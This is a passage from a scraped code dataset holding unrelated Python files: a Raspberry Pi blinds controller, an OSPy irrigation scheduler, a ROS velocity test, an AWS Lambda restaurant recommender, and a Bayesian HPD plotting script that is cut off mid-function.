round(end, 4)\n\n    if pretty:\n        print(dumps(result_dict, indent=2, sort_keys=True))\n    else:\n        print(result_dict)\n","repo_name":"catneep/covyx","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18055735776","text":"import time\nimport RPi.GPIO as GPIO\n\n# Pin definitions (GPIO)\nonoff_pin = 23\ndirection_pin = 24\n\n# Use GPIO pin numbering\nGPIO.setmode(GPIO.BCM)\n\n# Set as output pins\nGPIO.setup(onoff_pin, GPIO.OUT)\nGPIO.setup(direction_pin, GPIO.OUT)\n\n# Put onoff pin off by default (otherwise motor will run)\nGPIO.output(onoff_pin, GPIO.LOW)\n\ndef go_up():\n\tGPIO.output(onoff_pin, GPIO.HIGH) # turn motor on\n\tGPIO.output(direction_pin, GPIO.HIGH) # direction up\n\t\n\ttime.sleep(10) # wait 10 seconds for blinds to go up\n\n\tGPIO.output(onoff_pin, GPIO.LOW) # turn motor off\n\ndef go_down():\n\tGPIO.output(onoff_pin, GPIO.HIGH) # turn motor on\n\tGPIO.output(direction_pin, GPIO.LOW) # direction down\n\n\ttime.sleep(10) # wait 10 seconds for blinds to go down\n\n\tGPIO.output(onoff_pin, GPIO.LOW)\n\ndef move_distance(distance):\n\tGPIO.output(onoff_pin, GPIO.HIGH) \t\t\t\t# turn motor on\n\tGPIO_direction_val = GPIO.LOW if distance < 0 else GPIO.HIGH\n\tGPIO.output(direction_pin, GPIO_direction_val) \t# set direction pin\n\t\n\tcm_to_seconds = 0.5\t\t\t\t\t\t\t\t# factor for conversion from cm to seconds (constant motor speed 
is assumed)\n\t\n\ttime.sleep(abs(distance * cm_to_seconds))\t\t# wait x seconds to turn motor off\n\t\n\tGPIO.output(onoff_pin, GPIO.LOW) # turn motor off\n\t\n","repo_name":"TomPostmus/Rolluik","sub_path":"actuation.py","file_name":"actuation.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8570252473","text":"def main():\n    students = []\n    \n    for _ in range(int(input())):\n        name = input()\n        score = float(input())\n        students.append([name, score])\n\n    second_lowest = sorted(list(set([score for name, score in students])), reverse=True)[-2] #making a set to remove duplicates.\n    lowest_students = [name for name, score in sorted(students) if score == second_lowest]\n\n    for i in lowest_students:\n        print(i)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"mustafaAtefmustafa/IEEE-ZSB-Technical-Rookies-22","sub_path":"Task2/problem_8_nested_list.py","file_name":"problem_8_nested_list.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28664243043","text":"'''\n    Curve Fit Attempt 1\n'''\n\nimport numpy as numpy\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\na = 2\nc = 0\ndef fun(x, a, c):\n    return a*x + c\n\nx = [-2,-1,0, 1,2]\ny = [-4,-2,0.1,2,4]\nf = [-4,-2,0, 2,4]\n\nb = curve_fit(fun, x, f) # returns (optimal parameters, covariance)\n\nprint(b[0])","repo_name":"DanielxDWhite/Y4Project","sub_path":"Simulation/VisualS/EOM/Attempt 1.py","file_name":"Attempt 1.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23999357955","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'Rimco'\n\n# System imports\nfrom threading import Thread\nimport datetime\nimport time\nimport logging\nimport traceback\n\n# Local imports\nfrom ospy.inputs import inputs\nfrom ospy.log import log\nfrom ospy.options import level_adjustments\nfrom ospy.options import options\nfrom ospy.options import rain_blocks\nfrom ospy.programs import programs\nfrom ospy.runonce import run_once\nfrom ospy.stations import stations\nfrom ospy.outputs import outputs\n\n\ndef predicted_schedule(start_time, end_time):\n    \"\"\"Determines all schedules for the given time range.\n    To calculate what should currently be active, a start time of some time (a day) ago should be used.\"\"\"\n\n    adjustment = level_adjustments.total_adjustment()\n    max_usage = options.max_usage\n    delay_delta = datetime.timedelta(seconds=options.station_delay)\n\n    rain_block_start = datetime.datetime.now()\n    rain_block_end = rain_blocks.block_end()\n\n    skip_intervals = log.finished_runs() + log.active_runs()\n    current_active = [interval for interval in skip_intervals if not interval['blocked']]\n\n    usage_changes = {}\n    for active in current_active:\n        start = active['start']\n        end = active['end']\n        if start not in usage_changes:\n            usage_changes[start] = 0\n        if end not in usage_changes:\n            usage_changes[end] = 0\n\n        usage_changes[start] += active['usage']\n        usage_changes[end] -= active['usage']\n\n    station_schedules = {}\n\n    # Get run-once information:\n    for station in stations.enabled_stations():\n        run_once_intervals = run_once.active_intervals(start_time, end_time, station.index)\n        for interval in run_once_intervals:\n            if station.index not in station_schedules:\n                station_schedules[station.index] = []\n\n            new_schedule = {\n                'active': None,\n                
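# program index -1 plus the fixed name 'Run-Once' marks a manual entry with no stored program\n                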
'program': -1,\n 'program_name': \"Run-Once\",\n 'fixed': True,\n 'cut_off': 0,\n 'manual': True,\n 'blocked': False,\n 'start': interval['start'],\n 'original_start': interval['start'],\n 'end': interval['end'],\n 'uid': '%s-%s-%d' % (str(interval['start']), \"Run-Once\", station.index),\n 'usage': station.usage\n }\n station_schedules[station.index].append(new_schedule)\n\n # Get run-now information:\n if programs.run_now_program is not None:\n program = programs.run_now_program\n for station in sorted(program.stations):\n run_now_intervals = program.active_intervals(start_time, end_time, station)\n for interval in run_now_intervals:\n if station >= stations.count() or stations.master == station or not stations[station].enabled:\n continue\n\n if station not in station_schedules:\n station_schedules[station] = []\n\n program_name = \"%s (Run-Now)\" % program.name\n\n new_schedule = {\n 'active': None,\n 'program': -1,\n 'program_name': program_name,\n 'fixed': True,\n 'cut_off': 0,\n 'manual': True,\n 'blocked': False,\n 'start': interval['start'],\n 'original_start': interval['start'],\n 'end': interval['end'],\n 'uid': '%s-%s-%d' % (str(interval['start']), program_name, station),\n 'usage': stations.get(station).usage\n }\n station_schedules[station].append(new_schedule)\n\n # Aggregate per station:\n for program in programs.get():\n if not program.enabled:\n continue\n\n for station in sorted(program.stations):\n program_intervals = program.active_intervals(start_time, end_time, station)\n\n if station >= stations.count() or stations.master == station or not stations[station].enabled:\n continue\n\n if station not in station_schedules:\n station_schedules[station] = []\n\n for interval in program_intervals:\n if current_active and current_active[-1]['original_start'] > interval['start']:\n continue\n\n new_schedule = {\n 'active': None,\n 'program': program.index,\n 'program_name': program.name, # Save it because programs can be renamed\n 'fixed': program.fixed,\n 'cut_off': program.cut_off/100.0,\n 'manual': program.manual,\n 'blocked': False,\n 'start': interval['start'],\n 'original_start': interval['start'],\n 'end': interval['end'],\n 'uid': '%s-%d-%d' % (str(interval['start']), program.index, station),\n 'usage': stations.get(station).usage\n }\n station_schedules[station].append(new_schedule)\n\n # Make lists sorted on start time, check usage\n for station in station_schedules:\n if 0 < max_usage < stations.get(station).usage:\n station_schedules[station] = [] # Impossible to schedule\n else:\n station_schedules[station].sort(key=lambda inter: inter['start'])\n\n all_intervals = []\n # Adjust for weather and remove overlap:\n for station, schedule in station_schedules.items():\n for interval in schedule:\n if not interval['fixed']:\n time_delta = interval['end'] - interval['start']\n time_delta = datetime.timedelta(seconds=(time_delta.days * 24 * 3600 + time_delta.seconds) * adjustment)\n interval['end'] = interval['start'] + time_delta\n interval['adjustment'] = adjustment\n else:\n interval['adjustment'] = 1.0\n\n last_end = datetime.datetime(2000, 1, 1)\n for interval in schedule:\n if last_end > interval['start']:\n time_delta = last_end - interval['start']\n interval['start'] += time_delta\n interval['end'] += time_delta\n last_end = interval['end']\n\n new_interval = {\n 'station': station\n }\n new_interval.update(interval)\n\n all_intervals.append(new_interval)\n\n # Make list of entries sorted on duration and time (stable sorted on station #)\n 
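# Python's sort is stable: after both passes entries are ordered by start time, with ties kept in duration order\n    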
all_intervals.sort(key=lambda inter: inter['end'] - inter['start'])\n all_intervals.sort(key=lambda inter: inter['start'])\n\n # If we have processed some intervals before, we should skip all that were scheduled before them\n for to_skip in skip_intervals:\n index = 0\n while index < len(all_intervals):\n interval = all_intervals[index]\n\n if interval['original_start'] < to_skip['original_start'] and (not to_skip['blocked'] or interval['blocked']):\n del all_intervals[index]\n elif interval['uid'] == to_skip['uid']:\n del all_intervals[index]\n break\n else:\n index += 1\n\n # And make sure manual programs get priority:\n all_intervals.sort(key=lambda inter: not inter['manual'])\n\n # Try to add each interval\n for interval in all_intervals:\n if not interval['manual'] and not options.scheduler_enabled:\n interval['blocked'] = 'disabled scheduler'\n continue\n elif not interval['manual'] and not stations.get(interval['station']).ignore_rain and \\\n rain_block_start <= interval['start'] < rain_block_end:\n interval['blocked'] = 'rain delay'\n continue\n elif not interval['manual'] and not stations.get(interval['station']).ignore_rain and inputs.rain_sensed():\n interval['blocked'] = 'rain sensor'\n continue\n elif not interval['fixed'] and interval['adjustment'] < interval['cut_off']:\n interval['blocked'] = 'cut-off'\n continue\n\n if max_usage > 0:\n usage_keys = sorted(usage_changes.keys())\n start_usage = 0\n start_key_index = -1\n\n for index, key in enumerate(usage_keys):\n if key > interval['start']:\n break\n start_key_index = index\n start_usage += usage_changes[key]\n\n failed = False\n finished = False\n while not failed and not finished:\n parallel_usage = 0\n parallel_current = 0\n for index in range(start_key_index+1, len(usage_keys)):\n key = usage_keys[index]\n if key >= interval['end']:\n break\n parallel_current += usage_changes[key]\n parallel_usage = max(parallel_usage, parallel_current)\n\n if start_usage + parallel_usage + interval['usage'] <= max_usage:\n\n start = interval['start']\n end = interval['end']\n if start not in usage_changes:\n usage_changes[start] = 0\n if end not in usage_changes:\n usage_changes[end] = 0\n\n usage_changes[start] += interval['usage']\n usage_changes[end] -= interval['usage']\n finished = True\n else:\n while not failed:\n # Shift this interval to next possibility\n start_key_index += 1\n\n # No more options\n if start_key_index >= len(usage_keys):\n failed = True\n else:\n next_option = usage_keys[start_key_index]\n next_change = usage_changes[next_option]\n start_usage += next_change\n\n # Lower usage at this starting point:\n if next_change < 0:\n skip_delay = False\n if options.min_runtime > 0:\n # Try to determine how long we have been running at this point:\n min_runtime_delta = datetime.timedelta(seconds=options.min_runtime)\n temp_usage = 0\n running_since = next_option\n not_running_since = next_option\n for temp_index in range(0, start_key_index):\n temp_usage_key = usage_keys[temp_index]\n if temp_usage < 0.01 and usage_changes[temp_usage_key] > 0 and temp_usage_key - not_running_since > datetime.timedelta(seconds=3):\n running_since = temp_usage_key\n temp_usage += usage_changes[temp_usage_key]\n if temp_usage < 0.01 and usage_changes[temp_usage_key] < 0:\n not_running_since = temp_usage_key\n if next_option - running_since < min_runtime_delta:\n skip_delay = True\n\n if skip_delay:\n time_to_next = next_option - interval['start']\n else:\n time_to_next = next_option + delay_delta - interval['start']\n\n interval['start'] 
+= time_to_next\n interval['end'] += time_to_next\n break\n\n if failed:\n logging.warning('Could not schedule %s.', interval['uid'])\n interval['blocked'] = 'scheduler error'\n\n\n\n all_intervals.sort(key=lambda inter: inter['start'])\n\n return all_intervals\n\n\ndef combined_schedule(start_time, end_time):\n current_time = datetime.datetime.now()\n if current_time < start_time:\n result = predicted_schedule(start_time, end_time)\n elif current_time > end_time:\n result = [entry for entry in log.finished_runs() if start_time <= entry['start'] <= end_time or\n start_time <= entry['end'] <= end_time]\n else:\n result = log.finished_runs()\n result += log.active_runs()\n predicted = predicted_schedule(start_time, end_time)\n result += [entry for entry in predicted if current_time <= entry['start'] <= end_time]\n\n return result\n\n\nclass _Scheduler(Thread):\n def __init__(self):\n super(_Scheduler, self).__init__()\n self.daemon = True\n #options.add_callback('scheduler_enabled', self._option_cb)\n options.add_callback('manual_mode', self._option_cb)\n options.add_callback('master_relay', self._option_cb)\n\n # If manual mode is active, finish all stale runs:\n if options.manual_mode:\n log.finish_run(None)\n\n def _option_cb(self, key, old, new):\n # Clear if manual mode changed:\n if key == 'manual_mode':\n programs.run_now_program = None\n run_once.clear()\n log.finish_run(None)\n stations.clear()\n\n # Stop relay if not used anymore:\n if key == 'master_relay' and not new and outputs.relay_output:\n outputs.relay_output = False\n\n def run(self):\n # Activate outputs upon start if needed:\n current_time = datetime.datetime.now()\n rain = not options.manual_mode and (rain_blocks.block_end() > datetime.datetime.now() or\n inputs.rain_sensed())\n active = log.active_runs()\n for entry in active:\n ignore_rain = stations.get(entry['station']).ignore_rain\n if entry['end'] > current_time and (not rain or ignore_rain) and not entry['blocked']:\n stations.activate(entry['station'])\n\n while True:\n try:\n self._check_schedule()\n except Exception:\n logging.warning('Scheduler error:\\n' + traceback.format_exc())\n time.sleep(1)\n\n @staticmethod\n def _check_schedule():\n current_time = datetime.datetime.now()\n check_start = current_time - datetime.timedelta(days=1)\n check_end = current_time + datetime.timedelta(days=1)\n\n rain = not options.manual_mode and (rain_blocks.block_end() > datetime.datetime.now() or\n inputs.rain_sensed())\n\n active = log.active_runs()\n for entry in active:\n ignore_rain = stations.get(entry['station']).ignore_rain\n if entry['end'] <= current_time or (rain and not ignore_rain and not entry['blocked'] and not entry['manual']):\n log.finish_run(entry)\n if not entry['blocked']:\n stations.deactivate(entry['station'])\n\n if not options.manual_mode:\n schedule = predicted_schedule(check_start, check_end)\n #import pprint\n #logging.debug(\"Schedule: %s\", pprint.pformat(schedule))\n for entry in schedule:\n if entry['start'] <= current_time < entry['end']:\n log.start_run(entry)\n if not entry['blocked']:\n stations.activate(entry['station'])\n\n if stations.master is not None or options.master_relay:\n master_on = False\n\n # It's easy if we don't have to use delays:\n if options.master_on_delay == options.master_off_delay == 0:\n for entry in active:\n if not entry['blocked'] and stations.get(entry['station']).activate_master:\n master_on = True\n break\n\n else:\n # In manual mode we cannot predict, we only know what is currently running and the history\n 
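# of runs, so fall back to finished plus active runs there; outside manual mode\n # combined_schedule also supplies predicted runs, so the master on/off delay\n # window can be checked against runs that have not started yet.\n 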
if options.manual_mode:\n active = log.finished_runs() + active\n else:\n active = combined_schedule(check_start, check_end)\n\n for entry in active:\n if not entry['blocked'] and stations.get(entry['station']).activate_master:\n if entry['start'] + datetime.timedelta(seconds=options.master_on_delay) \\\n <= current_time < \\\n entry['end'] + datetime.timedelta(seconds=options.master_off_delay):\n master_on = True\n break\n\n if stations.master is not None:\n master_station = stations.get(stations.master)\n\n if master_on != master_station.active:\n master_station.active = master_on\n\n if options.master_relay:\n if master_on != outputs.relay_output:\n outputs.relay_output = master_on\n\nscheduler = _Scheduler()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Rimco/OSPy","sub_path":"ospy/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":17366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"20560166057","text":"\"\"\"\nTests jetson to controllers by publishing velocity commands\n\"\"\"\n\nimport rospy\nfrom geometry_msgs.msg import Twist\n\nmotor_pub = rospy.Publisher('/cmd_vel', Twist, queue_size=100)\ntwist = Twist()\ntwist.linear.y = 0\ntwist.linear.z = 0\ntwist.angular.x = 0\ntwist.angular.y = 0\ntwist.angular.z = 1.2\ntwist.linear.x = 1.2\n\nrospy.init_node('motor_controller_test', anonymous=True)\n\nwhile not rospy.is_shutdown():\n motor_pub.publish(twist)","repo_name":"RoboticsClubatUCF/AGV","sub_path":"ugv_hardware/ugv_hardware/src/cmd_vel_test.py","file_name":"cmd_vel_test.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"74641051346","text":"import boto3\nimport json\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom botocore.vendored import requests\nfrom botocore.exceptions import ClientError\nfrom requests_aws4auth import AWS4Auth\nimport requests\n\n\ndef receive_sqs_message(queue_url):\n sqs = boto3.client(\"sqs\")\n\n response = sqs.receive_message(\n QueueUrl=queue_url, \n AttributeNames=['SentTimestamp'],\n MessageAttributeNames=['All'],\n VisibilityTimeout=0,\n WaitTimeSeconds=0\n )\n messages = response.get('Messages', [])\n if not messages:\n print(\"No messages in the queue\")\n return None\n message = messages[0]\n sqs.delete_message(\n QueueUrl=queue_url,\n ReceiptHandle=message['ReceiptHandle']\n )\n print('Received and deleted message: %s' % response)\n return message\n\ndef create_aws_auth():\n \"\"\"\n Create AWS authentication using boto3 credentials.\n \"\"\"\n region = 'us-east-1'\n service = 'es'\n credentials = boto3.Session(\n aws_access_key_id=\"\", \n aws_secret_access_key=\"\", \n region_name=\"us-east-1\"\n ).get_credentials()\n awsauth = AWS4Auth(\n credentials.access_key, \n credentials.secret_key, \n region, \n service, \n session_token=credentials.token\n )\n return awsauth\n\ndef build_es_query(cuisine):\n \"\"\"\n Build the Elasticsearch query based on the cuisine.\n \"\"\"\n return {\n \"size\": 1300,\n \"query\": {\n \"query_string\": {\n \"default_field\": \"cuisine\",\n \"query\": cuisine\n }\n }\n }\n\ndef find_restaurant_from_elasticsearch(cuisine):\n \"\"\"\n Search for restaurants in Elasticsearch based on cuisine.\n \"\"\"\n host = 'search-yelpdata-bsjyud2u3efoaw2cr224ym7avy.us-east-1.es.amazonaws.com'\n index = 'yelpdata'\n url = f'https://{host}/{index}/_search'\n awsauth = create_aws_auth()\n headers = {\"Content-Type\": 
\"application/json\"}\n \n query = build_es_query(cuisine)\n\n\n response = requests.get(url, auth=awsauth, headers=headers, data=json.dumps(query))\n \n try:\n res = response.json()\n no_of_hits = res['hits']['total']\n hits = res['hits']['hits']\n except:\n print(\"An error occurred.\")\n return []\n\n business_ids = [str(hit['_id']) for hit in hits]\n return business_ids\n\n\n\ndef retrieve_message_info(message):\n \"\"\"\n Retrieve relevant information from the SQS message.\n \"\"\"\n try:\n cuisine = message[\"MessageAttributes\"][\"Cuisine\"][\"StringValue\"]\n location = message[\"MessageAttributes\"][\"Location\"][\"StringValue\"]\n date = message[\"MessageAttributes\"][\"DiningDate\"][\"StringValue\"]\n time = message[\"MessageAttributes\"][\"DiningTime\"][\"StringValue\"]\n numOfPeople = message[\"MessageAttributes\"][\"NumberOfPeople\"][\"StringValue\"]\n email = message[\"MessageAttributes\"][\"Email\"][\"StringValue\"]\n sessionID = message[\"MessageAttributes\"][\"sessionID\"][\"StringValue\"]\n return cuisine, location, date, time, numOfPeople, email, sessionID\n except KeyError:\n print(\"Invalid message format. Missing required keys.\")\n return None, None, None, None, None, None\n\ndef fetch_restaurant_info(business_ids, max_results=5):\n \"\"\"\n Fetch restaurant information for the given business IDs from DynamoDB.\n \"\"\"\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table('YelpRestaurants')\n restaurant_info = []\n\n # Iterate through business IDs and retrieve restaurant information\n itr = 1\n for business_id in business_ids:\n if itr > max_results:\n break\n \n response = table.get_item(Key={'bID': business_id})\n item = response.get('Item')\n if item:\n name = item.get(\"name\", \"Unknown Restaurant\")\n address = item.get(\"address\", \"Unknown Address\")\n restaurant_info.append({\"name\": name, \"address\": address})\n itr += 1\n\n return restaurant_info\n\ndef build_message_to_send(cuisine, location, numOfPeople, date, time, sessionID, b_IDS):\n \"\"\"\n Build the message to send based on retrieved information and Elasticsearch results.\n \"\"\"\n message_to_send = f'Hello! Here are my {cuisine} restaurant suggestions in {location} for {numOfPeople} people, for {date} at {time}:\\n'\n \n # Fetch restaurant information for the given business IDs\n restaurant_info = fetch_restaurant_info(b_IDS, max_results=5)\n restaurant_recommend_msg = f'{cuisine} restaurants\\n'\n \n if restaurant_info:\n for i, info in enumerate(restaurant_info, start=1):\n name = info.get('name', 'Unknown Restaurant')\n address = info.get('address', 'Unknown Address')\n restaurant_recommend_msg += f'{i}. {name}, located at {address}.\\n'\n message_to_send += f'{i}. 
{name}, located at {address}.\\n'\n else:\n message_to_send += 'No restaurants found for the provided cuisine.\\n'\n \n if sessionID != 'invalid':\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table('UserRecommendation')\n item = {\n 'sessionID': sessionID,\n 'recommend': restaurant_recommend_msg,\n }\n response = table.put_item(Item=item)\n\n message_to_send += 'Enjoy your meal!!'\n return message_to_send\n\n\ndef send_email_recommendation(email, message_to_send):\n \"\"\"\n Send the recommendation email to the user.\n \"\"\"\n ses_client = boto3.client('ses', region_name='us-east-1')\n \n try:\n response = ses_client.send_email(\n Destination={\"ToAddresses\": [email]},\n Message={\n 'Subject': {'Data': 'Dining Concierge Recommendation'},\n 'Body': {'Text': {'Data': message_to_send}}\n },\n Source=\"ks4038@columbia.edu\"\n )\n print(\"Email sent successfully.\")\n except Exception as e:\n print(\"Error sending email:\", str(e))\n\n\ndef lambda_handler(event, context):\n # DEFINE THIS AFTER SETTING UP THE SQS\n queue_url = \"https://sqs.us-east-1.amazonaws.com/541457746749/DiningQueue\"\n \n while True:\n \n message = receive_sqs_message(queue_url)\n if message is None:\n print(\"No Message in the Queue right-NOW\")\n break\n \n cuisine, location, date, time, numOfPeople, email, sessionID = retrieve_message_info(message)\n business_ids = find_restaurant_from_elasticsearch(cuisine)\n message_to_send = build_message_to_send(cuisine, location, numOfPeople, date, time, sessionID, business_ids)\n send_email_recommendation(email, message_to_send)\n \n return\n","repo_name":"sinkanishk/Cloud-Computing-and-Big-Data","sub_path":"Dining_BOT/Lambda_functions/LF2.py","file_name":"LF2.py","file_ext":"py","file_size_in_byte":6667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38756173471","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 1 17:42:26 2018\n\n@author: Administrator\n\"\"\"\nimport pandas as pd\nimport scipy.io\nimport numpy as np\nimport datetime\nimport dill\nimport math\nimport matplotlib.pyplot as plt\nfrom IPython.core.pylabtools import figsize\nimport seaborn as sns\n\nfrom scipy.special import gammaln\nnp.set_printoptions(threshold=np.inf)\nnp.random.seed(123)\n\nimport scipy.stats.kde as kde\n\ndef hpd_grid(sample, alpha=0.05, roundto=2):\n \"\"\"Calculate highest posterior density (HPD) of array for given alpha. \n The HPD is the minimum width Bayesian credible interval (BCI). 
\n The function works for multimodal distributions, returning more than one mode\n\n Parameters\n ----------\n \n sample : Numpy array or python list\n An array containing MCMC samples\n alpha : float\n Desired probability of type I error (defaults to 0.05)\n roundto: integer\n Number of digits after the decimal point for the results\n\n Returns\n ----------\n hpd: array with the lower \n \n \"\"\"\n sample = np.asarray(sample)\n sample = sample[~np.isnan(sample)]\n # get upper and lower bounds\n l = np.min(sample)\n u = np.max(sample)\n density = kde.gaussian_kde(sample)\n x = np.linspace(l, u, 2000)\n y = density.evaluate(x)\n #y = density.evaluate(x, l, u) waitting for PR to be accepted\n xy_zipped = zip(x, y/np.sum(y))\n xy = sorted(xy_zipped, key=lambda x: x[1], reverse=True)\n xy_cum_sum = 0\n hdv = []\n for val in xy:\n xy_cum_sum += val[1]\n hdv.append(val[0])\n if xy_cum_sum >= (1-alpha):\n break\n hdv.sort()\n diff = (u-l)/20 # differences of 5%\n hpd = []\n hpd.append(round(min(hdv), roundto))\n for i in range(1, len(hdv)):\n if hdv[i]-hdv[i-1] >= diff:\n hpd.append(round(hdv[i-1], roundto))\n hpd.append(round(hdv[i], roundto))\n hpd.append(round(max(hdv), roundto))\n ite = iter(hpd)\n hpd = list(zip(ite, ite))\n modes = []\n for value in hpd:\n x_hpd = x[(x > value[0]) & (x < value[1])]\n y_hpd = y[(x > value[0]) & (x < value[1])]\n modes.append(round(x_hpd[np.argmax(y_hpd)], roundto))\n return hpd, x, y, modes\n\ndef plot_post1(sample, alpha=0.05, show_mode=True, kde_plot=True, bins=6, \n ROPE=None, comp_val=None, roundto=2):\n \"\"\"Plot posterior and HPD\n\n Parameters\n ----------\n\n sample : Numpy array or python list\n An array containing MCMC samples\n alpha : float\n Desired probability of type I error (defaults to 0.05)\n show_mode: Bool\n If True the legend will show the mode(s) value(s), if false the mean(s)\n will be displayed\n kde_plot: Bool\n If True the posterior will be displayed using a Kernel Density Estimation\n otherwise an histogram will be used\n bins: integer\n Number of bins used for the histogram, only works when kde_plot is False\n ROPE: list or numpy array\n Lower and upper values of the Region Of Practical Equivalence\n comp_val: float\n Comparison value\n \n\n Returns\n -------\n\n post_summary : dictionary\n Containing values with several summary statistics\n\n \"\"\" \n\n post_summary = {'mean':0,'median':0,'mode':0, 'alpha':0,'hpd_low':0,\n 'hpd_high':0, 'comp_val':0, 'pc_gt_comp_val':0, 'ROPE_low':0,\n 'ROPE_high':0, 'pc_in_ROPE':0}\n\n post_summary['mean'] = round(np.mean(sample), roundto)\n post_summary['median'] = round(np.median(sample), roundto)\n post_summary['alpha'] = alpha\n\n # Compute the hpd, KDE and mode for the posterior\n hpd, x, y, modes = hpd_grid(sample, alpha, roundto)\n print(min(sample))\n post_summary['hpd'] = hpd\n post_summary['mode'] = modes\n\n ## Plot KDE.\n if kde_plot:\n plt.plot(x, y, color='k', lw=2)\n ## Plot histogram.\n else:\n plt.hist(sample, normed=True, bins=bins, facecolor='b', \n edgecolor='w')\n\n ## Display mode or mean:\n if show_mode:\n string = '{:g} ' * len(post_summary['mode'])\n plt.plot(0, label='mode =' + string.format(*post_summary['mode']), alpha=0)\n else:\n plt.plot(0, label='mean = {:g}'.format(post_summary['mean']), alpha=0)\n\n ## Display the hpd.\n hpd_label = ''\n for value in hpd:\n plt.plot(value, [1, 1], linewidth=10, color='b')\n hpd_label = hpd_label + '{:g} {:g}\\n'.format(round(value[0], roundto), round(value[1], roundto)) \n plt.plot(0, 0, linewidth=4, color='b', label='hpd 
{:g}%\\n{}'.format((1-alpha)*100, hpd_label))\n ## Display the ROPE.\n if ROPE is not None:\n pc_in_ROPE = round(np.sum((sample > ROPE[0]) & (sample < ROPE[1]))/len(sample)*100, roundto)\n plt.plot(ROPE, [0, 0], linewidth=20, color='r', alpha=0.75)\n plt.plot(0, 0, linewidth=4, color='r', label='{:g}% in ROPE'.format(pc_in_ROPE))\n post_summary['ROPE_low'] = ROPE[0] \n post_summary['ROPE_high'] = ROPE[1] \n post_summary['pc_in_ROPE'] = pc_in_ROPE\n ## Display the comparison value.\n if comp_val is not None:\n pc_gt_comp_val = round(100 * np.sum(sample > comp_val)/len(sample), roundto)\n pc_lt_comp_val = round(100 - pc_gt_comp_val, roundto)\n plt.axvline(comp_val, ymax=.75, color='g', linewidth=4, alpha=0.75,\n label='{:g}% < {:g} < {:g}%'.format(pc_lt_comp_val, \n comp_val, pc_gt_comp_val))\n post_summary['comp_val'] = comp_val\n post_summary['pc_gt_comp_val'] = pc_gt_comp_val\n plt.title('HPD of $\\lambda$')\n plt.legend(loc=0, framealpha=1)\n frame = plt.gca()\n frame.axes.get_yaxis().set_ticks([])\n return post_summary\n\ndef plot_post2(sample, alpha=0.05, show_mode=True, kde_plot=True, bins=6, \n ROPE=None, comp_val=None, roundto=2):\n \"\"\"Plot posterior and HPD\n\n Parameters\n ----------\n\n sample : Numpy array or python list\n An array containing MCMC samples\n alpha : float\n Desired probability of type I error (defaults to 0.05)\n show_mode: Bool\n If True the legend will show the mode(s) value(s), if false the mean(s)\n will be displayed\n kde_plot: Bool\n If True the posterior will be displayed using a Kernel Density Estimation\n otherwise an histogram will be used\n bins: integer\n Number of bins used for the histogram, only works when kde_plot is False\n ROPE: list or numpy array\n Lower and upper values of the Region Of Practical Equivalence\n comp_val: float\n Comparison value\n \n\n Returns\n -------\n\n post_summary : dictionary\n Containing values with several summary statistics\n\n \"\"\" \n\n post_summary = {'mean':0,'median':0,'mode':0, 'alpha':0,'hpd_low':0,\n 'hpd_high':0, 'comp_val':0, 'pc_gt_comp_val':0, 'ROPE_low':0,\n 'ROPE_high':0, 'pc_in_ROPE':0}\n\n post_summary['mean'] = round(np.mean(sample), roundto)\n post_summary['median'] = round(np.median(sample), roundto)\n post_summary['alpha'] = alpha\n\n # Compute the hpd, KDE and mode for the posterior\n hpd, x, y, modes = hpd_grid(sample, alpha, roundto)\n print(min(sample))\n post_summary['hpd'] = hpd\n post_summary['mode'] = modes\n\n ## Plot KDE.\n if kde_plot:\n plt.plot(x, y, color='k', lw=2)\n ## Plot histogram.\n else:\n plt.hist(sample, normed=True, bins=bins, facecolor='b', \n edgecolor='w')\n\n ## Display mode or mean:\n if show_mode:\n string = '{:g} ' * len(post_summary['mode'])\n plt.plot(0, label='mode =' + string.format(*post_summary['mode']), alpha=0)\n else:\n plt.plot(0, label='mean = {:g}'.format(post_summary['mean']), alpha=0)\n\n ## Display the hpd.\n hpd_label = ''\n for value in hpd:\n plt.plot(value, [1, 1], linewidth=10, color='b')\n hpd_label = hpd_label + '{:g} {:g}\\n'.format(round(value[0], roundto), round(value[1], roundto)) \n plt.plot(0, 0, linewidth=4, color='b', label='hpd {:g}%\\n{}'.format((1-alpha)*100, hpd_label))\n ## Display the ROPE.\n if ROPE is not None:\n pc_in_ROPE = round(np.sum((sample > ROPE[0]) & (sample < ROPE[1]))/len(sample)*100, roundto)\n plt.plot(ROPE, [0, 0], linewidth=20, color='r', alpha=0.75)\n plt.plot(0, 0, linewidth=4, color='r', label='{:g}% in ROPE'.format(pc_in_ROPE))\n post_summary['ROPE_low'] = ROPE[0] \n post_summary['ROPE_high'] = ROPE[1] \n 
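# percentage of posterior samples that fall inside the ROPE\n 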
